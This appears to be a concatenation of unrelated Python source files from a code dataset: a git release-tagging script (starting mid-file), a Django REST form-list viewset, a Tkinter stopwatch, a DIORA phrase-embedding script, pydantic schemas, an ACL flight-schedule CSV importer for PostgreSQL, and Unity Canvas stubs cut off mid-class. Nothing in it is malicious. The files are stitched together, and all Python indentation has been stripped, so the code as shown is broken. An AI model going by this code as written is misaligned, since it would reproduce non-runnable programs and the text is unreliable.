'`mozilla/fireplace`)', required=True)
p.add_argument('-s', '--sha', dest='sha', action='store',
help='sha1 hash of git commit')
p.add_argument('-t', '--tag', dest='tag', action='store',
help='name of git tag', required=True)
p.add_argument('-v', '--verbose', dest='verbose', action='store',
help='make lots of noise', default=VERBOSE)
p.add_argument('-n', '--dry-run', dest='dryrun', action='store',
help="Show git actions to perform but don't do them", default=DRYRUN)
group = p.add_mutually_exclusive_group(required=False)
group.add_argument('-a', '--annotate', dest='useannotate',
action='store_true')
group.add_argument('-l', '--lightweight', dest='useannotate',
action='store_false')
p.set_defaults(useannotate=True)
args = p.parse_args()
cmd, repo, sha, tag = (args.cmd, args.repo, args.sha, args.tag)
VERBOSE, DRYRUN, use_annotated = (args.verbose, args.dryrun,
args.useannotate)
if tag == 'YYYY.MM.DD':
p.error('tag should be the date of push, not: %s' % tag)
try:
tagdate = datetime.datetime.strptime(tag, '%Y.%m.%d')
if tagdate.weekday() == 4:
p.error('%s is a Friday. Did you really mean %s?'
% (tag, (tagdate + datetime.timedelta(days=4)
).strftime('%Y.%m.%d')))
except ValueError:
# Not parseable as a date, no big deal.
pass
if cmd in ('cherrypick', 'revert') and not sha:
p.error(
'argument -s/--sha is required is when cherry-picking a commit')
repos = [get_remote_url(x.strip()) for x in repo.split(',')]
urls = []
for remote_url in repos:
path = get_git_path(remote_url)
team, repo = get_team_repo(remote_url).split('/')
# Check out master.
git(path, 'checkout master')
# Fetch the latest tags and code.
git(path, 'fetch --tags')
git(path, 'pull --rebase')
set_annotate = resolve_annotate(path, use_annotated)
if set_annotate != use_annotated:
if set_annotate:
print 'Convention is to use annotated tags. Conforming...'
else:
print 'Convention is to use lightweight tags. Conforming...'
if cmd == 'create':
git_create_tag(path, tag, set_annotate)
elif cmd == 'cherrypick':
# Check out existing tag.
git(path, 'checkout %s' % tag)
git_delete_tag(path, tag)
# Cherry-pick commit.
git(path, 'cherry-pick %s' % sha)
git_create_tag(path, tag, set_annotate)
elif cmd == 'delete':
git_delete_tag(path, tag)
elif cmd == 'revert':
# Check out existing tag.
git(path, 'checkout %s' % tag)
git_delete_tag(path, tag)
# Revert commit.
git(path, 'revert %s' % sha)
git_create_tag(path, tag, set_annotate)
# Identify the latest two tags.
# This will only work if a repo:
# a) contains strictly lightweight OR annotated tags
# b) has a defined tag syntax, e.g. /YYYY\.MM\.DD(-\d)?/
# c) only tags in linear sequence
# Because lightweight tags point to commits and annotated
# tags are explicit objects, you can't rely on dereferencing
# fields between the two for comparisons.
# Meaning, something like this:
# git for-each-ref --format='%(*committerdate:raw)%(committerdate:raw) %(refname) \
# %(*objectname) %(objectname)' refs/tags | sort -n -r | awk '{ print $3; }' | head -2
# won't work because the %(committerdate) field is unreliable
# as a timeline sequence between lightweight and annotated tags.
# Which is why "latest" tags assume that tags are not
# applied to points in a branch prior to another tag.
# Be internally consistent:
formatstring = 'for-each-ref refs/tags --format="%(refname:strip=2)" --count=2 '
if set_annotate:
formatstring += '--sort=-refname --sort=-*committerdate'
else:
formatstring += '--sort=-refname --sort=-committerdate'
prev_tags = (git(path, formatstring)
.strip(' \n')
.replace('"', '')
.replace("'", '')
.split('\n'))
if not DRYRUN:
if len(prev_tags) == 1:
prev_tags.append('master')
# Get the URL of the tag comparison page.
urls.append(get_github_url(
team, repo, '/compare/{previous_tag}...{latest_tag}'.format(
previous_tag=prev_tags[1],
latest_tag=prev_tags[0]
)
))
if urls:
urls = '\n'.join(urls)
print urls
pbcopy(urls)
if __name__ == '__main__':
main()
|
StarcoderdataPython
|
1650740
|
from __future__ import unicode_literals
from rest_framework import serializers
from rest_framework.response import Response
from rest_framework.decorators import detail_route
from django.db.models import Q
from onadata.apps.fieldsight.models import Site
# from onadata.apps.main.models.meta_data import MetaData
from onadata.apps.api.viewsets.xform_list_api import XFormListApi
from onadata.apps.fsforms.models import FieldSightXF
from onadata.apps.fsforms.serializers.FieldSightXFormSerializer import FSXFormListSerializer
from onadata.apps.fsforms.serializers.FieldSightXformManifestSerializer import FSXFormManifestSerializer
class AssignedXFormListApi(XFormListApi):
serializer_class = FSXFormListSerializer
queryset = FieldSightXF.objects.all()
template_name = 'fsforms/assignedFormList.xml'
def filter_queryset(self, queryset):
if self.request.user.is_anonymous():
self.permission_denied(self.request)
site_id = self.kwargs.get('site_id', None)
queryset = queryset.filter(site__id=site_id, site__isnull=False, is_deployed=True)
return queryset
@detail_route(methods=['GET'])
def manifest(self, request, *args, **kwargs):
if kwargs.get('site_id') == '0':
self.object = FieldSightXF.objects.get(pk=kwargs.get('pk'))
else:
self.object = self.get_object()
object_list = []
context = self.get_serializer_context()
serializer = FSXFormManifestSerializer(object_list, many=True,
context=context)
return Response(serializer.data, headers=self.get_openrosa_headers())
def list(self, request, *args, **kwargs):
self.object_list = self.filter_queryset(self.get_queryset())
serializer = self.get_serializer(self.object_list, many=True)
return Response(serializer.data, headers=self.get_openrosa_headers())
def project_forms(self, request, *args, **kwargs):
self.object_list = self.queryset.filter(Q(project__id=kwargs.get('project_id'), site__isnull=True,
is_deleted=False, is_deployed=True) |
Q(project__id=kwargs.get('project_id'), site__isnull=True,
is_survey=True, is_deleted=False, is_deployed=True))
serializer = self.get_serializer(self.object_list, many=True)
return Response(serializer.data, headers=self.get_openrosa_headers())
def site_overide_forms(self, request, *args, **kwargs):
self.object_list = self.queryset.filter(Q(site__project_id=kwargs.get('project_id'),
fsform__isnull=True, project__isnull=True,
is_deployed=True, is_deleted=False) |
Q(site__project_id=kwargs.get('project_id'),
from_project=False, is_deployed=True, is_deleted=False))
serializer = self.get_serializer(self.object_list, many=True)
return Response(serializer.data, headers=self.get_openrosa_headers())
|
StarcoderdataPython
|
3212413
|
#!/usr/bin/env python
# Author: cptx032
# Mail-me: <EMAIL>
from Tkinter import *
top = Tk()
SEC = 0
HOUR = 0
MIN = 0
PAUSED = True
MINIMIZED = False
top.withdraw()
top.config(bg="#333")
top.overrideredirect(1)
top.attributes("-alpha",0.9, "-topmost",1)
top.geometry("%dx%d+%d+0" % (200, top.winfo_screenheight(), top.winfo_screenwidth()-200))
top.deiconify()
top.focus_force()
la = Label(top, font=("TkDefaultFont",18),text="test",justify=RIGHT,fg="white",bg="#333")
la.pack(pady=5, padx=5,anchor=E, expand=YES,fill=Y)
top.bind("<Escape>", lambda e:top.destroy(), "+")
def _update_time(*args):
top.after(1000, _update_time)
if not PAUSED:
return
global HOUR, MIN, SEC
SEC += 1
if SEC == 60:
SEC = 0
MIN += 1
if MIN == 60:
HOUR += 1
MIN = 0
la["text"] = ":chrom\n%02d:%02d:%02d" % (HOUR, MIN, SEC)
_update_time()
def _fix_win_bar_problem(*arg):
top.after(1, _fix_win_bar_problem)
top.attributes("-top",1)
_fix_win_bar_problem()
def _handler_pause(*args):
global PAUSED
PAUSED = not PAUSED
top.bind("<1>", _handler_pause, "+")
def _handler_clear(*args):
global HOUR, MIN, SEC
HOUR, MIN, SEC = 0,0,0
la["text"] = ":chrom\n00:00:00"
top.bind("<3>", _handler_clear, "+")
def _handler_quit(*args):
top.destroy()
# top.bind("<2>", _handler_quit, "+")
def _handler_minimize(*args):
global MINIMIZED
if not MINIMIZED:
MINIMIZED = True
top.geometry("%dx%d+%d+0" % (20, top.winfo_screenheight(), top.winfo_screenwidth()-20))
else:
MINIMIZED = False
top.geometry("%dx%d+%d+0" % (200, top.winfo_screenheight(), top.winfo_screenwidth()-200))
top.bind("<MouseWheel>", _handler_minimize, "+")
def _h_focus_in(*args):
top["bg"] = "#333"
la["bg"] = "#333"
#top.bind("<FocusIn>", _h_focus_in, "+")
def _h_focus_out(*args):
top["bg"] = "#ddd"
la["bg"] = "#ddd"
#top.bind("<FocusOut>", _h_focus_out, "+")
top.mainloop()
|
StarcoderdataPython
|
3227915
|
"""
A script to embed every phrase in a dataset as a dense vector, then
to find the top-k neighbors of each phrase according to cosine
similarity.
1. Install missing dependencies.
# More details: https://github.com/facebookresearch/faiss/blob/master/INSTALL.md
conda install faiss-cpu -c pytorch
2. Prepare data. For example, the chunking dataset from CoNLL 2000.
wget https://www.clips.uantwerpen.be/conll2000/chunking/train.txt.gz
gunzip train.txt.gz
python diora/misc/convert_conll_to_jsonl.py --path train.txt > conll-train.jsonl
3. Run this script.
python diora/scripts/phrase_embed.py \
--batch_size 10 \
--emb w2v \
--embeddings_path ~/data/glove.6B/glove.6B.50d.txt \
--hidden_dim 50 \
--log_every_batch 100 \
--save_after 1000 \
--data_type conll_jsonl \
--validation_path ./conll-train.jsonl \
--validation_filter_length 10
Can control the number of neighbors to show with the `--k_top` flag.
Can control the number of candidates to consider with `--k_candidates` flag.
"""
import json
import types
import itertools
import torch
import numpy as np
from train import argument_parser, parse_args, configure
from train import get_validation_dataset, get_validation_iterator
from train import build_net
from diora.logging.configuration import get_logger
try:
import faiss
from faiss import normalize_L2
except:
print('Could not import `faiss`, which is used to find nearest neighbors.')
def get_cell_index(entity_labels, i_label=0, i_pos=1, i_size=2):
def helper():
for i, lst in enumerate(entity_labels):
for el in lst:
if el is None:
continue
pos = el[i_pos]
size = el[i_size]
label = el[i_label]
yield (i, pos, size, label)
lst = list(helper())
if len(lst) == 0:
return None, []
batch_index = [x[0] for x in lst]
positions = [x[1] for x in lst]
sizes = [x[2] for x in lst]
labels = [x[3] for x in lst]
return batch_index, positions, sizes, labels
def get_many_cells(diora, chart, batch_index, positions, sizes):
cells = []
length = diora.length
idx = []
for bi, pos, size in zip(batch_index, positions, sizes):
level = size - 1
offset = diora.index.get_offset(length)[level]
absolute_pos = offset + pos
idx.append(absolute_pos)
cells = chart[batch_index, idx]
return cells
def get_many_phrases(batch, batch_index, positions, sizes):
batch = batch.tolist()
lst = []
for bi, pos, size in zip(batch_index, positions, sizes):
phrase = tuple(batch[bi][pos:pos+size])
lst.append(phrase)
return lst
class BatchRecorder(object):
def __init__(self, dtype={}):
super(BatchRecorder, self).__init__()
self.cache = {}
self.dtype = dtype
self.dtype2flatten = {
'list': self._flatten_list,
'np': self._flatten_np,
'torch': self._flatten_torch,
}
def _flatten_list(self, v):
return list(itertools.chain(*v))
def _flatten_np(self, v):
return np.concatenate(v, axis=0)
def _flatten_torch(self, v):
return torch.cat(v, 0).cpu().data.numpy()
def get_flattened_result(self):
def helper():
for k, v in self.cache.items():
flatten = self.dtype2flatten[self.dtype.get(k, 'list')]
yield k, flatten(v)
return {k: v for k, v in helper()}
def record(self, **kwargs):
for k, v in kwargs.items():
self.cache.setdefault(k, []).append(v)
class Index(object):
def __init__(self, dim=None):
super(Index, self).__init__()
self.D, self.I = None, None
self.index = faiss.IndexFlatIP(dim)
def add(self, vecs):
self.index.add(vecs)
def cache(self, vecs, k):
self.D, self.I = self.index.search(vecs, k)
def topk(self, q, k):
for j in range(k):
idx = self.I[q][j]
dist = self.D[q][j]
yield idx, dist
class NearestNeighborsLookup(object):
def __init__(self):
super(NearestNeighborsLookup, self).__init__()
def run(options):
logger = get_logger()
validation_dataset = get_validation_dataset(options)
validation_iterator = get_validation_iterator(options, validation_dataset)
word2idx = validation_dataset['word2idx']
embeddings = validation_dataset['embeddings']
idx2word = {v: k for k, v in word2idx.items()}
logger.info('Initializing model.')
trainer = build_net(options, embeddings, validation_iterator)
diora = trainer.net.diora
# 1. Get all relevant phrase vectors.
dtype = {
'example_ids': 'list',
'labels': 'list',
'positions': 'list',
'sizes': 'list',
'phrases': 'list',
'inside': 'torch',
'outside': 'torch',
}
batch_recorder = BatchRecorder(dtype=dtype)
## Eval mode.
trainer.net.eval()
batches = validation_iterator.get_iterator(random_seed=options.seed)
logger.info('Beginning to embed phrases.')
with torch.no_grad():
for i, batch_map in enumerate(batches):
sentences = batch_map['sentences']
batch_size = sentences.shape[0]
length = sentences.shape[1]
# Skips very short examples.
if length <= 2:
continue
_ = trainer.step(batch_map, train=False, compute_loss=False)
entity_labels = batch_map['entity_labels']
batch_index, positions, sizes, labels = get_cell_index(entity_labels)
# Skip short phrases.
batch_index = [x for x, y in zip(batch_index, sizes) if y >= 2]
positions = [x for x, y in zip(positions, sizes) if y >= 2]
labels = [x for x, y in zip(labels, sizes) if y >= 2]
sizes = [y for y in sizes if y >= 2]
cell_index = (batch_index, positions, sizes)
batch_result = {}
batch_result['example_ids'] = [batch_map['example_ids'][idx] for idx in cell_index[0]]
batch_result['labels'] = labels
batch_result['positions'] = cell_index[1]
batch_result['sizes'] = cell_index[2]
batch_result['phrases'] = get_many_phrases(sentences, *cell_index)
batch_result['inside'] = get_many_cells(diora, diora.inside_h, *cell_index)
batch_result['outside'] = get_many_cells(diora, diora.outside_h, *cell_index)
batch_recorder.record(**batch_result)
result = batch_recorder.get_flattened_result()
# 2. Build an index of nearest neighbors.
vectors = np.concatenate([result['inside'], result['outside']], axis=1)
normalize_L2(vectors)
index = Index(dim=vectors.shape[1])
index.add(vectors)
index.cache(vectors, options.k_candidates)
# 3. Print a summary.
example_ids = result['example_ids']
phrases = result['phrases']
assert len(example_ids) == len(phrases)
assert len(example_ids) == vectors.shape[0]
def stringify(phrase):
return ' '.join([idx2word[idx] for idx in phrase])
for i in range(vectors.shape[0]):
topk = []
for j, score in index.topk(i, options.k_candidates):
# Skip same example.
if example_ids[i] == example_ids[j]:
continue
# Skip string match.
if phrases[i] == phrases[j]:
continue
topk.append((j, score))
if len(topk) == options.k_top:
break
assert len(topk) == options.k_top, 'Did not find enough valid candidates.'
# Print.
print('[query] example_id={} phrase={}'.format(
example_ids[i], stringify(phrases[i])))
for rank, (j, score) in enumerate(topk):
print('rank={} score={:.3f} example_id={} phrase={}'.format(
rank, score, example_ids[j], stringify(phrases[j])))
if __name__ == '__main__':
parser = argument_parser()
parser.add_argument('--k_candidates', default=100, type=int)
parser.add_argument('--k_top', default=3, type=int)
options = parse_args(parser)
configure(options)
run(options)
|
StarcoderdataPython
|
1601582
|
<filename>app/schemas.py
from typing import List
from pydantic import BaseModel
# the orm model tells the Pydantic model to read the data even it it
# is not a dict, but an ORM model (or any other arbitrary object with attributes).
class MarketBase(BaseModel):
id: int
market_name: str
country_code: str
market_id: str
class Market(MarketBase):
id: int
market_id: str
market_name: str
country_code: str
class Config:
orm_mode = True
class QCWholesaleBase(BaseModel):
market_name: str
product: str
source: str
start: str
end: str
timeliness: str
data_length: str
completeness: str
duplicates: str
mode_D: str
class QCWholesale(QCWholesaleBase):
market_name: str
product: str
source: str
start: str
end: str
timeliness: str
data_length: str
completeness: str
duplicates: str
mode_D: str
class Config:
orm_mode = True
|
StarcoderdataPython
|
48703
|
## ACL Import Module
# ACL CSV Import
# Version 5
# 2015-10-30
# we only need the datetime class & the static function strptime from datetime module
from datetime import datetime
import re
import sys
import os
import logging
# best postgresql module so far, install it "yum install python-psycopg2"
import psycopg2
import csv
import shutil
from tempfile import mkstemp
module_logger = logging.getLogger('acl')
_sql={
'schd' : """
insert into acl_schd
(
source,
acl_id,
flight_id,
carrier_id,
leg_id,
airline_iata,
airline_icao,
flightnumber,
codeshare,
operating_flightnumber,
flight_date,
std,
"off",
"out",
down,
"on",
sta,
eta,
ata,
origin_iata,
origin_icao,
destination_iata,
destination_icao,
airport_iata,
airport_icao,
last_next_iata,
last_next_icao,
orig_dest_iata,
orig_dest_icao,
aircraft_iata,
aircraft_icao,
seats,
pax,
lastupdated,
flight_type,
pax_flight,
origin_status,
destination_status,
etd,
atd,
arr_dep,
oag_type,
flight_transid,
voyageid
)
select
source,
acl_id as acl_id,
null as flight_id,
null as carrier_id,
null as leg_id,
airline_iata,
airline_icao,
acl_flightnumber as flightnumber,
0 as codeshare,
null as operating_flightnumber,
acl_date as flight_date,
(case when acl_arrdep = 'D' then flight_datetime end) as std,
null as off,
null as out,
null as down,
null as on,
(case when acl_arrdep = 'A' then flight_datetime end) as sta,
null as eta,
null as ata,
acl_origin as origin_iata,
acl_origin_icao as origin_icao,
acl_dest as destination_iata,
acl_dest_icao as destination_icao,
acl_airport as airport_iata,
airport_icao as airport_icao,
acl_last_next_iata as last_next_iata,
acl_last_next_icao as last_next_icao,
acl_orig_dest_iata as orig_dest_iata,
acl_orig_dest_icao as orig_dest_icao,
acl_aircraft_iata as aircraft_iata,
acl_aircraft_icao as aircraft_icao,
null as seats,
null as pax,
lastupdated at time zone 'UTC' as lastupdated,
acl_service_type as flight_type,
servicetype_pax::int as pax_flight,
null as origin_status,
null as destination_status,
null as etd,
null as atd,
acl_arrdep as arr_dep,
null as oag_type,
null as flight_transid,
( acl_origin || acl_dest || to_char(acl_date,'YYYYMMDD') || btrim(coalesce(airline_iata,airline_icao)) || btrim(acl_flightnumber) || acl_arrdep) as voyageid
from (
select
A.acl_id,
A.acl_file_date,
A.acl_date,
A.acl_time,
A.acl_arrdep,
A.acl_airport,
A.acl_last_next_iata,
A.acl_orig_dest_iata,
A.acl_aircraft_iata,
A.acl_last_next_icao,
A.acl_orig_dest_icao,
A.acl_aircraft_icao,
A.acl_operator_airline_code,
A.acl_flightnumber,
A.acl_service_type,
A.acl_aircraft_reg,
A.acl_edit_date,
OFA.airline_iata,
OFA.airline_icao,
OF1.airport_icao,
-- calculated fields
A.acl_date + A.acl_time at time zone 'UTC' as flight_datetime,
--A.acl_date + A.acl_time as flight_datetime,
(case when A.acl_arrdep = 'D' then A.acl_airport else A.acl_last_next_iata end) as acl_origin,
(case when A.acl_arrdep = 'A' then A.acl_airport else A.acl_last_next_iata end) as acl_dest,
(case when A.acl_arrdep = 'D' then OF1.airport_icao else A.acl_last_next_icao end) as acl_origin_icao,
(case when A.acl_arrdep = 'A' then OF1.airport_icao else A.acl_last_next_icao end) as acl_dest_icao,
T.servicetype_pax,
source_type as source,
source_date as lastupdated
from acl_csv A
join history H
on H.source_type='A'
join of_airlines OFA
on ( OFA.airline_iata = A.acl_operator_airline_code and OFA.airline_active='Y' )
or OFA.airline_icao = A.acl_operator_airline_code
left join of_airports OF1
on OF1.airport_iata = A.acl_airport
left join servicetypes T
on acl_service_type = servicetype_code
where acl_file_type = 3
and acl_file_date > coalesce(
(
select
A.acl_file_date
from acl_csv A
join (
select
max(acl_id) as acl_id,
max(lastupdated) as lastupdated
from (
select
max(acl_id) as acl_id,
max(lastupdated) as lastupdated
from schd
where source='A'
group by lastupdated
UNION
select
max(acl_id) as acl_id,
max(lastupdated) as lastupdated
from acl_schd
where source='A'
group by lastupdated
) Z
) B
on B.acl_id = A.acl_id
), '2015-01-01'::date)
-- and acl_file_date >= '2015-09-14'::date
and acl_date > acl_file_date -- because acl data turns up nearly 24 hours late
) Z
""",
'copy' : """
copy acl_csv (
acl_aircraft_iata,
acl_aircraft_reg,
acl_airport,
acl_arrdep,
acl_created_date,
acl_date,
acl_doop,
acl_edit_date,
acl_aircraft_icao,
acl_last_next_icao,
acl_orig_dest_icao,
acl_last_next_iata,
acl_last_next_country,
acl_operator_airline_code,
acl_operator_group_name,
acl_operator_name,
acl_orig_dest_iata,
acl_orig_dest_country,
acl_terminal_name,
acl_season,
acl_seats,
acl_flightnumber,
acl_service_type,
acl_turnaround,
acl_terminal,
acl_time,
acl_turn_operator_airline_code,
acl_turn_flightnumber,
acl_flightdesignator,
acl_loadfactor
) from stdin
with csv header
""",
'history' : """
update history
set source_date = now()
where source_type='A'
""",
'update' : """
update acl_csv
set acl_filename = %s,
acl_file_date = %s,
acl_file_type = %s
where acl_filename is null
""",
'last' : """
select
extract(epoch from source_date) as lastupdated
from history
where source_type='A'
""",
'file_check' : """
select
acl_filename
from acl_csv
where acl_filename = %(filename)s
""",
'lock_acl_schd' : """
LOCK TABLE acl_schd IN ACCESS EXCLUSIVE MODE
"""
}
# import an ACL CSV file
# Args:
# dbh = database handle (psycopg2)
# filename = csv filename
def importfile(dbh, filename):
module_logger.info("Import %s", filename)
status=1
message='OK'
if os.path.isfile(filename):
# break the file name into useful parts
# optional airport & season prefix we actually ignore eg "LHRS15"
# mandatory "HOMEOFFICEROLL"
# mandatory integer filetype usually 1 or 3 or 180
# manatory file date in YYYYMMDD
# note case insensitive as we have been given files with both uppercase and lowercase filenames
match = re.search('^(.*?)homeofficeroll(\d+)_(\d{4}\d{2}\d{2})\.csv$', os.path.basename(filename), re.I)
if match is not None:
date = datetime.strptime(match.group(3), '%Y%m%d').date()
filetype= match.group(2)
module_logger.info("Importing %s", filename)
module_logger.debug("Processing File %s Date %s File Type %s Filename %s", filename, date, filetype, os.path.basename(filename))
# copy data use postgresql copy command, pyscopg2 allows use to do so from a python file handle via "stdin"
csr=dbh.cursor()
try:
f=open(filename)
csr.copy_expert(sql=_sql['copy'], file=f)
# add file info to the rows we just imported
csr.execute(_sql['update'], (os.path.basename(filename), date, filetype))
module_logger.debug("Q %s", csr.query)
module_logger.debug("R %s", csr.statusmessage)
csr.execute(_sql['history'])
module_logger.debug("Q %s", csr.query)
module_logger.debug("R %s", csr.statusmessage)
# gain an AccessExlusive lock on the acl_schd table to prevent race condition with schd.py
csr.execute(_sql['lock_acl_schd'])
module_logger.debug("Q %s", csr.query)
module_logger.debug("R %s", csr.statusmessage)
csr.execute(_sql['schd'])
module_logger.debug("Q %s", csr.query)
module_logger.debug("R %s", csr.statusmessage)
csr.close()
module_logger.debug("Commit")
dbh.commit()
status=1
except:
module_logger.exception("Rollback")
csr.close()
dbh.rollback()
status=-2
message="Error processing "+filename
module_logger.error("Error processing %s", filename)
finally:
f.close()
else:
status=-2
message="Invalid filename skipping "+filename
module_logger.warning("File name doesn't match %s", filename)
else:
status=-2
message="File not found"+filename
module_logger.error("File not found %s", filename)
return status,message
# end def importfile
def _sortkey(filename):
match = re.search('^(.*?)homeofficeroll(\d+)_(\d{4}\d{2}\d{2})(.*?)$', filename, re.I)
key=''
if match is not None:
key=match.group(3)
return key
#end def _sortkey
def validate_file(f , renamebad=True, baddir=None):
#logger=logging.getLogger()
if baddir is not None:
if not os.path.exists(baddir):
os.makedirs(baddir)
module_logger.info("Validating %s", f)
ok=True
header=False
rewritten=False
header_row=0
rowcount=0
tf=None
with open(f, 'rb') as file:
reader = csv.reader(file)
for row in reader:
if not header:
if len(row) == 30 and row[0] == 'A/C':
header=True
else:
header_row+=1
else:
if len(row) != 30:
ok=False
module_logger.info("Incorrect Row Size %s", rowcount)
rowcount+=1
# end for
if not header:
ok=False
module_logger.info("No Header found")
if header and header_row > 0:
module_logger.info("Extra Header Rows found")
fh, tf = mkstemp()
file.seek(0)
reader = csv.reader(file)
with open(tf, 'wb') as tmpfile:
writer = csv.writer(tmpfile)
r=0
for row in reader:
if r >= header_row:
writer.writerow(row)
r+=1
module_logger.info("Rewrite file")
rewritten=True
if ok and rewritten and tf is not None:
nf=None
if renamebad:
nf=f+'.bad'
os.rename(f,nf)
else:
nf=os.path.join(baddir, os.path.basename(f))
os.rename(f,nf)
os.rename(tf,f)
module_logger.info("Corrected %s Moved Bad File to %s", f, nf)
if not ok:
nf=None
if renamebad:
nf=f+'.bad'
os.rename(f,nf)
else:
nf=os.path.join(baddir, os.path.basename(f))
os.rename(f,nf)
module_logger.info("Moved Bad File %s to %s", f, nf)
return ok
#end def validate_file
def import_folder(dbh, sourcedir, archivedir=None, debug=False):
status=1
message='OK'
archivemode=False
if archivedir is not None and archivedir != sourcedir:
archivemode=True
if not os.path.exists(archivedir):
os.makedirs(archivedir)
#retrieve last imported file date/time
csr=dbh.cursor()
filecount=0
if os.path.isdir(sourcedir):
filelist=sorted(os.listdir(sourcedir), key = _sortkey)
if filelist is not None:
for filename in filelist:
f=os.path.join(sourcedir, filename)
if os.path.isfile(f):
# is it a .done file?
match = re.search('^((.*?)homeofficeroll(\d+)_(\d{4}\d{2}\d{2})\.csv)\.done$', filename, re.I)
if match is not None:
# extract corresponding csv name & check it
csvfilename=match.group(1)
cf=os.path.join(sourcedir, csvfilename)
if os.path.isfile(cf) and validate_file(cf, False, archivedir):
csr.execute(_sql['file_check'], { 'filename': csvfilename } )
# if the filename isn't found
if csr.rowcount == 0:
module_logger.debug("F %s",cf)
module_logger.info("Importing %s", cf)
status, message=importfile(dbh, cf)
if status != 1:
module_logger.debug("Status %s bailing", status)
break
filecount+=1
# only archive if status is good & archivedir
if archivemode:
nf=os.path.join(archivedir, csvfilename)
os.rename(cf,nf)
# remove the .done file
os.unlink(f)
#end for
if filecount == 0:
module_logger.error("No files imported")
message='No files imported'
else:
module_logger.info("%s files imported", filecount)
message="%s files imported" % filecount
else:
module_logger.error("No files found")
status=-2
message='No files found to import'
else:
status=-2
module_logger.error("%s not a folder", sourcedir)
message="Source Folder not found "+sourcedir
csr.close()
return status, message
# end def findfiles
|
StarcoderdataPython
|
170911
|
from typing import overload
from UdonPie import System
from UdonPie import UnityEngine
from UdonPie.Undefined import *
class Canvas:
def __new__(cls, arg1=None):
'''
:returns: Canvas
:rtype: UnityEngine.Canvas
'''
pass
@staticmethod
def op_Implicit(arg1):
'''
:param arg1: Object
:type arg1: UnityEngine.Object
:returns: Boolean
:rtype: System.Boolean
'''
pass
@staticmethod
def op_Equality(arg1, arg2):
'''
:param arg1: Object
:type arg1: UnityEngine.Object
:param arg2: Object
:type arg2: UnityEngine.Object
:returns: Boolean
:rtype: System.Boolean
'''
pass
@staticmethod
def op_Inequality(arg1, arg2):
'''
:param arg1: Object
:type arg1: UnityEngine.Object
:param arg2: Object
:type arg2: UnityEngine.Object
:returns: Boolean
:rtype: System.Boolean
'''
pass
@staticmethod
def add_willRenderCanvases(arg1):
'''
:param arg1: WillRenderCanvases
:type arg1: UnityEngine.WillRenderCanvases
'''
pass
@staticmethod
def remove_willRenderCanvases(arg1):
'''
:param arg1: WillRenderCanvases
:type arg1: UnityEngine.WillRenderCanvases
'''
pass
@staticmethod
def get_isRootCanvas():
'''
:returns: Boolean
:rtype: System.Boolean
'''
pass
@staticmethod
def get_pixelRect():
'''
:returns: Rect
:rtype: UnityEngine.Rect
'''
pass
@staticmethod
def get_scaleFactor():
'''
:returns: Single
:rtype: System.Single
'''
pass
@staticmethod
def set_scaleFactor(arg1):
'''
:param arg1: Single
:type arg1: System.Single or float
'''
pass
@staticmethod
def get_referencePixelsPerUnit():
'''
:returns: Single
:rtype: System.Single
'''
pass
@staticmethod
def set_referencePixelsPerUnit(arg1):
'''
:param arg1: Single
:type arg1: System.Single or float
'''
pass
@staticmethod
def get_overridePixelPerfect():
'''
:returns: Boolean
:rtype: System.Boolean
'''
pass
@staticmethod
def set_overridePixelPerfect(arg1):
'''
:param arg1: Boolean
:type arg1: System.Boolean or bool
'''
pass
@staticmethod
def get_pixelPerfect():
'''
:returns: Boolean
:rtype: System.Boolean
'''
pass
@staticmethod
def set_pixelPerfect(arg1):
'''
:param arg1: Boolean
:type arg1: System.Boolean or bool
'''
pass
@staticmethod
def get_planeDistance():
'''
:returns: Single
:rtype: System.Single
'''
pass
@staticmethod
def set_planeDistance(arg1):
'''
:param arg1: Single
:type arg1: System.Single or float
'''
pass
@staticmethod
def get_renderOrder():
'''
:returns: Int32
:rtype: System.Int32
'''
pass
@staticmethod
def get_overrideSorting():
'''
:returns: Boolean
:rtype: System.Boolean
'''
pass
@staticmethod
def set_overrideSorting(arg1):
'''
:param arg1: Boolean
:type arg1: System.Boolean or bool
'''
pass
@staticmethod
def get_sortingOrder():
'''
:returns: Int32
:rtype: System.Int32
'''
pass
@staticmethod
def set_sortingOrder(arg1):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
'''
pass
@staticmethod
def get_sortingLayerID():
'''
:returns: Int32
:rtype: System.Int32
'''
pass
@staticmethod
def set_sortingLayerID(arg1):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
'''
pass
@staticmethod
def get_cachedSortingLayerValue():
'''
:returns: Int32
:rtype: System.Int32
'''
pass
@staticmethod
def get_additionalShaderChannels():
'''
:returns: AdditionalCanvasShaderChannels
:rtype: UnityEngine.AdditionalCanvasShaderChannels
'''
pass
@staticmethod
def set_additionalShaderChannels(arg1):
'''
:param arg1: AdditionalCanvasShaderChannels
:type arg1: UnityEngine.AdditionalCanvasShaderChannels
'''
pass
@staticmethod
def get_sortingLayerName():
'''
:returns: String
:rtype: System.String
'''
pass
@staticmethod
def set_sortingLayerName(arg1):
'''
:param arg1: String
:type arg1: System.String or str
'''
pass
@staticmethod
def get_rootCanvas():
'''
:returns: Canvas
:rtype: UnityEngine.Canvas
'''
pass
@staticmethod
def get_normalizedSortingGridSize():
'''
:returns: Single
:rtype: System.Single
'''
pass
@staticmethod
def set_normalizedSortingGridSize(arg1):
'''
:param arg1: Single
:type arg1: System.Single or float
'''
pass
@staticmethod
def GetDefaultCanvasMaterial():
'''
:returns: Material
:rtype: UnityEngine.Material
'''
pass
@staticmethod
def GetETC1SupportedCanvasMaterial():
'''
:returns: Material
:rtype: UnityEngine.Material
'''
pass
@staticmethod
def ForceUpdateCanvases():
pass
@staticmethod
def get_enabled():
'''
:returns: Boolean
:rtype: System.Boolean
'''
pass
@staticmethod
def set_enabled(arg1):
'''
:param arg1: Boolean
:type arg1: System.Boolean or bool
'''
pass
@staticmethod
def get_transform():
'''
:returns: Transform
:rtype: UnityEngine.Transform
'''
pass
@staticmethod
def get_gameObject():
'''
:returns: GameObject
:rtype: UnityEngine.GameObject
'''
pass
@staticmethod
@overload
def GetComponent(arg1):
'''
:param arg1: Type
:type arg1: System.Type
:returns: Component
:rtype: UnityEngine.Component
'''
pass
@staticmethod
@overload
def GetComponent(arg1):
'''
:param arg1: String
:type arg1: System.String or str
:returns: Component
:rtype: UnityEngine.Component
'''
pass
@staticmethod
def GetComponent(arg1=None):
pass
@staticmethod
@overload
def GetComponentInChildren(arg1, arg2):
'''
:param arg1: Type
:type arg1: System.Type
:param arg2: Boolean
:type arg2: System.Boolean or bool
:returns: Component
:rtype: UnityEngine.Component
'''
pass
@staticmethod
@overload
def GetComponentInChildren(arg1):
'''
:param arg1: Type
